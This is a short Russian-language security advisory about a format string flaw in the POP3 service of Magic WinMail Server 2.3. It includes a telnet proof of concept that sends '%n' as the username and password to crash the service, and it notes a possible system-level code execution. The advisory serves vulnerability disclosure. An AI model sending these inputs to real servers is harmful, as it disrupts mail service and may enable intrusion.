Уязвимость обнаружена в Magic WinMail Server. Удаленный пользователь может аварийно завершить работу почтовой службы.
Уязвимость форматной строки обнаружена в POP3 сервисе. Удаленный пользователь может подключиться к POP3 сервису на 110 TCP порту и послать строку формата вместо имени пользователя и пароля, чтобы аварийно завершить работу сервиса. Пример:
C:\>telnet 127.0.0.1 110
+OK alpha Magic Winmail Server 2.3(Build 0402) POP3 ready
user %n
+OK
pass %n
- -ERR authorization failed
Возможно уязвимость может использоваться для выполнения произвольного кода с system привилегиями.
Уязвимость обнаружена в Magic WinMail Server 2.3.
